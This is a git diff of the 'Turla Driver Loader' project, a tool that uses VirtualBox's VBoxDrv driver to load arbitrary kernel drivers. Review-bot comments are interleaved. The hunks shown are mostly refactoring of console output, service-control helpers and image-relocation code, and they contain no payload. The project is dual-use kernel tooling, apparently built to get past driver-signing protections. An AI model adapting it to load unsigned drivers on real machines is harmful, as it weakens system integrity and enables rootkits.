diff --git a/.gitattributes b/.gitattributes deleted file mode 100644 index bdb0cab..0000000 --- a/.gitattributes +++ /dev/null @@ -1,17 +0,0 @@ -# Auto detect text files and perform LF normalization -* text=auto - -# Custom for Visual Studio -*.cs diff=csharp - -# Standard to msysgit -*.doc diff=astextplain -*.DOC diff=astextplain -*.docx diff=astextplain -*.DOCX diff=astextplain -*.dot diff=astextplain -*.DOT diff=astextplain -*.pdf diff=astextplain -*.PDF diff=astextplain -*.rtf diff=astextplain -*.RTF diff=astextplain diff --git a/Compiled/Furutaka.exe b/Compiled/Furutaka.exe index 0c6dfa3..348832e 100644 Binary files a/Compiled/Furutaka.exe and b/Compiled/Furutaka.exe differ diff --git a/README.md b/README.md index db1b469..06cf92b 100644 --- a/README.md +++ b/README.md @@ -32,7 +32,7 @@ In order to build from source you need Microsoft Visual Studio 2015 U1 and later # Authors -(c) 2016 TDL Project +(c) 2016 - 2017 TDL Project # Credits diff --git a/Source/Furutaka/Furutaka.sln b/Source/Furutaka/Furutaka.sln index ff6fb44..759d1e2 100644 --- a/Source/Furutaka/Furutaka.sln +++ b/Source/Furutaka/Furutaka.sln @@ -1,7 +1,7 @@  Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio 14 -VisualStudioVersion = 14.0.24720.0 +VisualStudioVersion = 14.0.25420.1 MinimumVisualStudioVersion = 10.0.40219.1 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Furutaka", "Furutaka.vcxproj", "{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}" EndProject diff --git a/Source/Furutaka/Furutaka.vcxproj b/Source/Furutaka/Furutaka.vcxproj index 8a78707..ce94cc4 100644 --- a/Source/Furutaka/Furutaka.vcxproj +++ b/Source/Furutaka/Furutaka.vcxproj @@ -1,14 +1,6 @@  - - Debug - Win32 - - - Release - Win32 - Debug x64 @@ -26,19 +18,6 @@ Furutaka - - Application - true - v140 - Unicode - - - Application - false - v140 - true - Unicode - Application true @@ -57,12 +36,6 @@ - - - - - - 
@@ -70,20 +43,10 @@ - - true - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - true .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ - - - false - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ AllRules.ruleset @@ -93,23 +56,6 @@ NativeRecommendedRules.ruleset false - - - - - Level4 - Disabled - WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - CompileAsC - - - Console - true - TDLMain - RequireAdministrator - - @@ -124,30 +70,7 @@ Console true TDLMain - RequireAdministrator - - - - - Level4 - - - MaxSpeed - true - true - WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - CompileAsC - true - - - Console - true - true - true - TDLMain - true - RequireAdministrator + AsInvoker @@ -164,6 +87,8 @@ true true false + Guard + MultiThreaded Console diff --git a/Source/Furutaka/Furutaka.vcxproj.user b/Source/Furutaka/Furutaka.vcxproj.user index 8f42863..b67d65e 100644 --- a/Source/Furutaka/Furutaka.vcxproj.user +++ b/Source/Furutaka/Furutaka.vcxproj.user @@ -4,14 +4,6 @@ C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys WindowsLocalDebugger - - C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys - WindowsLocalDebugger - - - C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys - WindowsLocalDebugger - C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys WindowsLocalDebugger diff --git a/Source/Furutaka/cui.c b/Source/Furutaka/cui.c index 39f6777..49d9770 100644 --- a/Source/Furutaka/cui.c +++ b/Source/Furutaka/cui.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: CUI.C * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 18 Jan 2016 +* DATE: 20 Mar 2017 * * Console output. * 
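Review bot: The requested execution level in the remaining x64 link settings drops from `RequireAdministrator` to `AsInvoker`, so the loader no longer triggers an elevation prompt and, when started from a non-elevated console, the SCM calls in instdrv.c (OpenSCManager with SC_MANAGER_ALL_ACCESS, CreateService) fail late with ERROR_ACCESS_DENIED instead of up front. If dropping the manifest requirement is intentional, main.c should test the process token's elevation at startup and print a clear message before touching the SCM; otherwise the previous value should be restored. The XML element names are stripped in this rendering, so this reads the change from the bare values. The later hunk `@@ -164,6 +87,8 @@` adding `Guard` and `MultiThreaded` (Control Flow Guard and the static CRT, if these are the ControlFlowGuard and RuntimeLibrary elements) is a welcome hardening and needs no change.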
@@ -19,46 +19,95 @@ #include "global.h"
 /*
-* cuiPrintText
+* cuiPrintTextA
 *
 * Purpose:
 *
 * Output text to the console or file.
 *
+* ANSI variant
+*
 */
-VOID cuiPrintText(
- _In_ HANDLE hOutConsole,
- _In_ LPWSTR lpText,
- _In_ BOOL ConsoleOutputEnabled,
- _In_ BOOL UseReturn
- )
+VOID cuiPrintTextA(
+ _In_ HANDLE hOutConsole,
+ _In_ LPSTR lpText,
+ _In_ BOOL ConsoleOutputEnabled,
+ _In_ BOOL UseReturn
+)
 {
- SIZE_T consoleIO;
- DWORD bytesIO;
- LPWSTR Buffer;
+ SIZE_T consoleIO;
+ DWORD bytesIO;
+ LPSTR Buffer;
- if (lpText == NULL)
- return;
+ if (lpText == NULL)
+ return;
- consoleIO = _strlen(lpText);
- if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
- return;
+ consoleIO = _strlen_a(lpText);
+ if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
+ return;
- consoleIO = consoleIO * sizeof(WCHAR) + 4 + sizeof(UNICODE_NULL);
- Buffer = (LPWSTR)RtlAllocateHeap(RtlGetCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, consoleIO);
- if (Buffer) {
+ consoleIO = (5 + consoleIO);
+ Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO);
+ if (Buffer) {
- _strcpy(Buffer, lpText);
- if (UseReturn) _strcat(Buffer, TEXT("\r\n"));
+ _strcpy_a(Buffer, lpText);
+ if (UseReturn) _strcat_a(Buffer, "\r\n");
- consoleIO = _strlen(Buffer);
+ consoleIO = _strlen_a(Buffer);
- if (ConsoleOutputEnabled == TRUE) {
- WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
- }
- else {
- WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);
- }
- RtlFreeHeap(RtlGetCurrentPeb()->ProcessHeap, 0, Buffer);
- }
+ if (ConsoleOutputEnabled != FALSE) {
+ WriteConsoleA(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
+ }
+ else {
+ WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(CHAR)), &bytesIO, NULL);
+ }
+ HeapFree(GetProcessHeap(), 0, Buffer);
+ }
+}
+
+/*
+* cuiPrintTextW
+*
+* Purpose:
+*
+* Output text to the console or file.
+*
+* UNICODE variant
+*
+*/
+VOID cuiPrintTextW(
+ _In_ HANDLE hOutConsole,
+ _In_ LPWSTR lpText,
+ _In_ BOOL ConsoleOutputEnabled,
+ _In_ BOOL UseReturn
+)
+{
+ SIZE_T consoleIO;
+ DWORD bytesIO;
+ LPWSTR Buffer;
+
+ if (lpText == NULL)
+ return;
+
+ consoleIO = _strlen(lpText);
+ if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
+ return;
+
+ consoleIO = (5 + consoleIO) * sizeof(WCHAR);
+ Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO);
+ if (Buffer) {
+
+ _strcpy(Buffer, lpText);
+ if (UseReturn) _strcat(Buffer, TEXT("\r\n"));
+
+ consoleIO = _strlen(Buffer);
+
+ if (ConsoleOutputEnabled != FALSE) {
+ WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
+ }
+ else {
+ WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);
+ }
+ HeapFree(GetProcessHeap(), 0, Buffer);
+ }
 }
diff --git a/Source/Furutaka/cui.h b/Source/Furutaka/cui.h
index a2ded5f..3412d3a 100644
--- a/Source/Furutaka/cui.h
+++ b/Source/Furutaka/cui.h
@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-* (C) COPYRIGHT AUTHORS, 2016
+* (C) COPYRIGHT AUTHORS, 2016 - 2017
 *
 * TITLE: CUI.H
 *
-* VERSION: 1.00
+* VERSION: 1.10
 *
-* DATE: 18 Jan 2016
+* DATE: 04 Feb 2017
 *
 * Common header file for console ui.
 *
@@ -18,11 +18,22 @@
 *******************************************************************************/
 #pragma once
-#include "global.h"
+VOID cuiPrintTextA(
+ _In_ HANDLE hOutConsole,
+ _In_ LPSTR lpText,
+ _In_ BOOL ConsoleOutputEnabled,
+ _In_ BOOL UseReturn
+);
-VOID cuiPrintText(
- _In_ HANDLE hOutConsole,
- _In_ LPWSTR lpText,
- _In_ BOOL ConsoleOutputEnabled,
- _In_ BOOL UseReturn
- );
+VOID cuiPrintTextW(
+ _In_ HANDLE hOutConsole,
+ _In_ LPWSTR lpText,
+ _In_ BOOL ConsoleOutputEnabled,
+ _In_ BOOL UseReturn
+);
+
+#ifdef UNICODE
+#define cuiPrintText cuiPrintTextW
+#else
+#define cuiPrintText cuiPrintTextA
+#endif
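Review bot: Both new functions silently drop the message when `lpText` is longer than `MAX_PATH * 4` characters and discard the result of `WriteConsoleA`/`WriteConsole` and `WriteFile`, so a caller of this VOID interface cannot tell that nothing was written; on the file-output path a closed or full handle is now indistinguishable from success. The header comments should at least state the limit, e.g. add to each Purpose block `* Text longer than MAX_PATH * 4 characters, or a NULL pointer, is discarded without output.`, and the write result together with `bytesIO` could be compared against the requested length. The buffer arithmetic itself is sound: `5 + consoleIO` leaves room for the two-character line break and the terminator in both the CHAR and the WCHAR variant.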
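Review bot: Removing `#include "global.h"` leaves cui.h non-self-contained: its prototypes use `HANDLE`, `LPSTR`, `LPWSTR`, `BOOL` and the `_In_` SAL annotations, so it now compiles only when the includer has already pulled in the Windows headers, and the `UNICODE` switch at the bottom depends on that macro being defined before this header is reached. Either include the headers these declarations need directly in cui.h, or document the contract at the top, e.g. `// Must be included after windows.h (via global.h); cuiPrintText resolves per UNICODE at the point of inclusion.`.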
diff --git a/Source/Furutaka/global.h b/Source/Furutaka/global.h
index c6cf4d0..b15eb0d 100644
--- a/Source/Furutaka/global.h
+++ b/Source/Furutaka/global.h
@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-* (C) COPYRIGHT AUTHORS, 2016
+* (C) COPYRIGHT AUTHORS, 2016 - 2017
 *
 * TITLE: GLOBAL.H
 *
-* VERSION: 1.00
+* VERSION: 1.10
 *
-* DATE: 01 Feb 2016
+* DATE: 17 Apr 2017
 *
 * Common header file for the program support routines.
 *
diff --git a/Source/Furutaka/instdrv.c b/Source/Furutaka/instdrv.c
index 5d53482..16c29bb 100644
--- a/Source/Furutaka/instdrv.c
+++ b/Source/Furutaka/instdrv.c
@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-* (C) COPYRIGHT AUTHORS, 2015 - 2016, portions (C) Mark Russinovich, FileMon
+* (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon
 *
 * TITLE: INSTDRV.C
 *
-* VERSION: 1.11
+* VERSION: 1.10
 *
-* DATE: 01 Feb 2016
+* DATE: 17 Apr 2017
 *
 * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
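Review bot: The version in the instdrv.c header goes backwards, from `1.11` to `1.10`, while its date advances to 2017; the other files in this commit move from 1.00 to 1.10, so this looks like their value was copied in rather than the module's own version bumped. Either keep `* VERSION: 1.11` or raise it above the old value; a module version that decreases misleads anyone comparing releases.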
@@ -25,33 +25,33 @@
 *
 */
 BOOL scmInstallDriver(
- _In_ SC_HANDLE SchSCManager,
- _In_ LPCTSTR DriverName,
- _In_opt_ LPCTSTR ServiceExe
- )
+ _In_ SC_HANDLE SchSCManager,
+ _In_ LPCTSTR DriverName,
+ _In_opt_ LPCTSTR ServiceExe
+)
 {
- SC_HANDLE schService;
+ SC_HANDLE schService;
- schService = CreateService(SchSCManager, // SCManager database
- DriverName, // name of service
- DriverName, // name to display
- SERVICE_ALL_ACCESS, // desired access
- SERVICE_KERNEL_DRIVER, // service type
- SERVICE_DEMAND_START, // start type
- SERVICE_ERROR_NORMAL, // error control type
- ServiceExe, // service's binary
- NULL, // no load ordering group
- NULL, // no tag identifier
- NULL, // no dependencies
- NULL, // LocalSystem account
- NULL // no password
- );
- if (schService == NULL) {
- return FALSE;
- }
+ schService = CreateService(SchSCManager, // SCManager database
+ DriverName, // name of service
+ DriverName, // name to display
+ SERVICE_ALL_ACCESS, // desired access
+ SERVICE_KERNEL_DRIVER, // service type
+ SERVICE_DEMAND_START, // start type
+ SERVICE_ERROR_NORMAL, // error control type
+ ServiceExe, // service's binary
+ NULL, // no load ordering group
+ NULL, // no tag identifier
+ NULL, // no dependencies
+ NULL, // LocalSystem account
+ NULL // no password
+ );
+ if (schService == NULL) {
+ return FALSE;
+ }
- CloseServiceHandle(schService);
- return TRUE;
+ CloseServiceHandle(schService);
+ return TRUE;
 }
 /*
@@ -63,26 +63,26 @@ BOOL scmInstallDriver(
 *
 */
 BOOL scmStartDriver(
- _In_ SC_HANDLE SchSCManager,
- _In_ LPCTSTR DriverName
- )
+ _In_ SC_HANDLE SchSCManager,
+ _In_ LPCTSTR DriverName
+)
 {
- SC_HANDLE schService;
- BOOL ret;
+ SC_HANDLE schService;
+ BOOL ret;
- schService = OpenService(SchSCManager,
- DriverName,
- SERVICE_ALL_ACCESS
- );
- if (schService == NULL)
- return FALSE;
+ schService = OpenService(SchSCManager,
+ DriverName,
+ SERVICE_ALL_ACCESS
+ );
+ if (schService == NULL)
+ return FALSE;
- ret = StartService(schService, 0, NULL)
- || GetLastError() == ERROR_SERVICE_ALREADY_RUNNING;
+ ret = StartService(schService, 0, NULL)
+ || GetLastError() == ERROR_SERVICE_ALREADY_RUNNING;
- CloseServiceHandle(schService);
+ CloseServiceHandle(schService);
- return ret;
+ return ret;
 }
 /*
@@ -94,35 +94,35 @@ BOOL scmStartDriver(
 *
 */
 BOOL scmOpenDevice(
- _In_ LPCTSTR DriverName,
- _Inout_opt_ PHANDLE lphDevice
- )
+ _In_ LPCTSTR DriverName,
+ _Inout_opt_ PHANDLE lphDevice
+)
 {
- TCHAR completeDeviceName[64];
- HANDLE hDevice;
+ TCHAR completeDeviceName[64];
+ HANDLE hDevice;
- RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName));
- wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName);
+ RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName));
+ wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName);
- hDevice = CreateFile(completeDeviceName,
- GENERIC_READ | GENERIC_WRITE,
- 0,
- NULL,
- OPEN_EXISTING,
- FILE_ATTRIBUTE_NORMAL,
- NULL
- );
- if (hDevice == INVALID_HANDLE_VALUE)
- return FALSE;
+ hDevice = CreateFile(completeDeviceName,
+ GENERIC_READ | GENERIC_WRITE,
+ 0,
+ NULL,
+ OPEN_EXISTING,
+ FILE_ATTRIBUTE_NORMAL,
+ NULL
+ );
+ if (hDevice == INVALID_HANDLE_VALUE)
+ return FALSE;
- if (lphDevice) {
- *lphDevice = hDevice;
- }
- else {
- CloseHandle(hDevice);
- }
+ if (lphDevice) {
+ *lphDevice = hDevice;
+ }
+ else {
+ CloseHandle(hDevice);
+ }
- return TRUE;
+ return TRUE;
 }
 /*
@@ -134,39 +134,39 @@ BOOL scmOpenDevice(
 *
 */
 BOOL scmStopDriver(
- _In_ SC_HANDLE SchSCManager,
- _In_ LPCTSTR DriverName
- )
+ _In_ SC_HANDLE SchSCManager,
+ _In_ LPCTSTR DriverName
+)
 {
- INT iRetryCount;
- SC_HANDLE schService;
- BOOL ret;
- SERVICE_STATUS serviceStatus;
+ BOOL ret;
+ INT iRetryCount;
+ SC_HANDLE schService;
+ SERVICE_STATUS serviceStatus;
- ret = FALSE;
- schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS);
- if (schService == NULL) {
- return ret;
- }
+ ret = FALSE;
+ schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS);
+ if (schService == NULL) {
+ return ret;
+ }
- iRetryCount = 5;
- do {
- SetLastError(0);
+ iRetryCount = 5;
+ do {
+ SetLastError(0);
- ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus);
- if (ret == TRUE)
- break;
+ ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus);
+ if (ret != FALSE)
+ break;
- if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING)
- break;
+ if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING)
+ break;
- Sleep(1000);
- iRetryCount--;
- } while (iRetryCount);
+ Sleep(1000);
+ iRetryCount--;
+ } while (iRetryCount);
- CloseServiceHandle(schService);
+ CloseServiceHandle(schService);
- return ret;
+ return ret;
 }
 /*
@@ -178,27 +178,19 @@ BOOL scmStopDriver(
 *
 */
 BOOL scmRemoveDriver(
- _In_ SC_HANDLE SchSCManager,
- _In_ LPCTSTR DriverName
- )
+ _In_ SC_HANDLE SchSCManager,
+ _In_ LPCTSTR DriverName
+)
 {
- SC_HANDLE schService;
- BOOL bResult = FALSE;
+ SC_HANDLE schService;
+ BOOL bResult = FALSE;
- schService = OpenService(SchSCManager,
- DriverName,
- DELETE
- );
-
- if (schService == NULL) {
- return bResult;
- }
-
- bResult = DeleteService(schService);
-
- CloseServiceHandle(schService);
-
- return bResult;
+ schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS);
+ if (schService) {
+ bResult = DeleteService(schService);
+ CloseServiceHandle(schService);
+ }
+ return bResult;
 }
 /*
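Review bot: In scmRemoveDriver the OpenService access mask widens from `DELETE` to `SERVICE_ALL_ACCESS`, yet `DeleteService` is the only operation performed on the handle and `DELETE` is exactly the right it requires, so the wider request buys nothing and makes the call fail for a caller that holds only the delete right on the service object. Keep the minimal mask in the rewritten line: `schService = OpenService(SchSCManager, DriverName, DELETE);`. The same over-request is visible in scmStartDriver and scmStopDriver (SERVICE_START and SERVICE_STOP respectively would suffice), but those lines are only re-indented by this commit.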
@@ -210,26 +202,23 @@ BOOL scmRemoveDriver(
 *
 */
 BOOL scmUnloadDeviceDriver(
- _In_ LPCTSTR Name
- )
+ _In_ LPCTSTR Name
+)
 {
- SC_HANDLE schSCManager;
- BOOL bResult = FALSE;
+ SC_HANDLE schSCManager;
+ BOOL bResult = FALSE;
- if (Name == NULL) {
- return bResult;
- }
+ if (Name == NULL) {
+ return bResult;
+ }
- schSCManager = OpenSCManager(NULL,
- NULL,
- SC_MANAGER_ALL_ACCESS
- );
- if (schSCManager) {
- scmStopDriver(schSCManager, Name);
- bResult = scmRemoveDriver(schSCManager, Name);
- CloseServiceHandle(schSCManager);
- }
- return bResult;
+ schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
+ if (schSCManager) {
+ scmStopDriver(schSCManager, Name);
+ bResult = scmRemoveDriver(schSCManager, Name);
+ CloseServiceHandle(schSCManager);
+ }
+ return bResult;
 }
 /*
@@ -241,25 +230,25 @@ BOOL scmUnloadDeviceDriver(
 *
 */
 BOOL scmLoadDeviceDriver(
- _In_ LPCTSTR Name,
- _In_opt_ LPCTSTR Path,
- _Inout_ PHANDLE lphDevice
- )
+ _In_ LPCTSTR Name,
+ _In_opt_ LPCTSTR Path,
+ _Inout_ PHANDLE lphDevice
+)
 {
- SC_HANDLE schSCManager;
- BOOL bResult = FALSE;
+ SC_HANDLE schSCManager;
+ BOOL bResult = FALSE;
- if (Name == NULL) {
- return bResult;
- }
+ if (Name == NULL) {
+ return bResult;
+ }
- schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
- if (schSCManager) {
- scmRemoveDriver(schSCManager, Name);
- scmInstallDriver(schSCManager, Name, Path);
- scmStartDriver(schSCManager, Name);
- bResult = scmOpenDevice(Name, lphDevice);
- CloseServiceHandle(schSCManager);
- }
- return bResult;
+ schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
+ if (schSCManager) {
+ scmRemoveDriver(schSCManager, Name);
+ scmInstallDriver(schSCManager, Name, Path);
+ scmStartDriver(schSCManager, Name);
+ bResult = scmOpenDevice(Name, lphDevice);
+ CloseServiceHandle(schSCManager);
+ }
+ return bResult;
 }
diff --git a/Source/Furutaka/instdrv.h b/Source/Furutaka/instdrv.h
index 91400f2..42cf1cb 100644
--- a/Source/Furutaka/instdrv.h
+++ b/Source/Furutaka/instdrv.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2015, portions (C) Mark Russinovich, FileMon +* (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon * * TITLE: INSTDRV.H * * VERSION: 1.10 * -* DATE: 10 Mar 2015 +* DATE: 17 Apr 2017 * * Common header file for the program SCM usage. * @@ -16,39 +16,40 @@ * PARTICULAR PURPOSE. * *******************************************************************************/ +#pragma once BOOL scmInstallDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName, - _In_opt_ LPCTSTR ServiceExe - ); + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName, + _In_opt_ LPCTSTR ServiceExe +); BOOL scmStartDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ); + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +); BOOL scmOpenDevice( - _In_ LPCTSTR DriverName, - _Inout_opt_ PHANDLE lphDevice - ); + _In_ LPCTSTR DriverName, + _Inout_opt_ PHANDLE lphDevice +); BOOL scmStopDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ); + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +); BOOL scmRemoveDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ); + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +); BOOL scmUnloadDeviceDriver( - _In_ LPCTSTR Name - ); + _In_ LPCTSTR Name +); BOOL scmLoadDeviceDriver( - _In_ LPCTSTR Name, - _In_opt_ LPCTSTR Path, - _Inout_ PHANDLE lphDevice - ); + _In_ LPCTSTR Name, + _In_opt_ LPCTSTR Path, + _Inout_ PHANDLE lphDevice +); diff --git a/Source/Furutaka/main.c b/Source/Furutaka/main.c index aaad15b..c0b7c24 100644 --- a/Source/Furutaka/main.c +++ b/Source/Furutaka/main.c 
@@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: MAIN.C * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 04 Feb 2016 +* DATE: 17 Apr 2017 * * Furutaka entry point. * @@ -32,7 +32,7 @@ HANDLE g_ConOut = NULL; HANDLE g_hVBox = INVALID_HANDLE_VALUE; BOOL g_ConsoleOutput = FALSE; BOOL g_VBoxInstalled = FALSE; -WCHAR BE = 0xFEFF; +WCHAR g_BE = 0xFEFF; #define VBoxDrvSvc TEXT("VBoxDrv") #define supImageName "furutaka" @@ -40,11 +40,11 @@ WCHAR BE = 0xFEFF; #define PAGE_SIZE 0x1000 #define scDataOffset 0x214 //shellcode data offset -#define T_LOADERTITLE TEXT("Turla Driver Loader v1.0 (04/02/16)") +#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1 (17/04/17)") #define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n") #define T_LOADERRUN TEXT("Another instance running, close it before\r\n") #define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n") -#define T_LOADERINTRO TEXT("Turla Driver Loader v1.0.0 started\r\n(c) 2016 TDL Project\r\nSupported x64 OS : 7 and above\r\n") +#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.0 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n") /* * TDLVBoxInstalled @@ -55,23 +55,23 @@ WCHAR BE = 0xFEFF; * */ BOOL TDLVBoxInstalled( - VOID - ) + VOID +) { - BOOL bPresent = FALSE; - LRESULT lRet; - HKEY hKey = NULL; - - lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"), - 0, KEY_READ, &hKey); + BOOL bPresent = FALSE; + LRESULT lRet; + HKEY hKey = NULL; - bPresent = (hKey != NULL); + lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"), + 0, KEY_READ, &hKey); - if (hKey) { - RegCloseKey(hKey); - } + bPresent = (hKey != NULL); - return bPresent; + if (hKey) { + RegCloseKey(hKey); + } + + return bPresent; } /* 
@@ -83,51 +83,51 @@ BOOL TDLVBoxInstalled( * */ void TDLRelocImage( - ULONG_PTR Image, - ULONG_PTR NewImageBase - ) + ULONG_PTR Image, + ULONG_PTR NewImageBase +) { - PIMAGE_OPTIONAL_HEADER popth; - PIMAGE_BASE_RELOCATION rel; - DWORD_PTR delta; - LPWORD chains; - DWORD c, p, rsz; + PIMAGE_OPTIONAL_HEADER popth; + PIMAGE_BASE_RELOCATION rel; + DWORD_PTR delta; + LPWORD chains; + DWORD c, p, rsz; - popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; + popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; - if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) - if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) - { - rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + - popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); + if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) + if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) + { + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); - rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; - delta = (DWORD_PTR)NewImageBase - popth->ImageBase; - c = 0; + rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + delta = (DWORD_PTR)NewImageBase - popth->ImageBase; + c = 0; - while (c < rsz) { - p = sizeof(IMAGE_BASE_RELOCATION); - chains = (LPWORD)((PBYTE)rel + p); + while (c < rsz) { + p = sizeof(IMAGE_BASE_RELOCATION); + chains = (LPWORD)((PBYTE)rel + p); - while (p < rel->SizeOfBlock) { + while (p < rel->SizeOfBlock) { - switch (*chains >> 12) { - case IMAGE_REL_BASED_HIGHLOW: - *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; - break; - case IMAGE_REL_BASED_DIR64: - *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; - break; - } + switch (*chains >> 12) { + case IMAGE_REL_BASED_HIGHLOW: + *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 
0x0fff)) += (DWORD)delta; + break; + case IMAGE_REL_BASED_DIR64: + *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; + break; + } - chains++; - p += sizeof(WORD); - } + chains++; + p += sizeof(WORD); + } - c += rel->SizeOfBlock; - rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); - } - } + c += rel->SizeOfBlock; + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); + } + } } /* @@ -139,19 +139,19 @@ void TDLRelocImage( * */ ULONG_PTR TDLGetProcAddress( - ULONG_PTR KernelBase, - ULONG_PTR KernelImage, - LPCSTR FunctionName - ) + ULONG_PTR KernelBase, + ULONG_PTR KernelImage, + LPCSTR FunctionName +) { - ANSI_STRING cStr; - ULONG_PTR pfn = 0; + ANSI_STRING cStr; + ULONG_PTR pfn = 0; - RtlInitString(&cStr, FunctionName); - if (!NT_SUCCESS(LdrGetProcedureAddress((PVOID)KernelImage, &cStr, 0, (PVOID)&pfn))) - return 0; + RtlInitString(&cStr, FunctionName); + if (!NT_SUCCESS(LdrGetProcedureAddress((PVOID)KernelImage, &cStr, 0, (PVOID)&pfn))) + return 0; - return KernelBase + (pfn - KernelImage); + return KernelBase + (pfn - KernelImage); } /* 
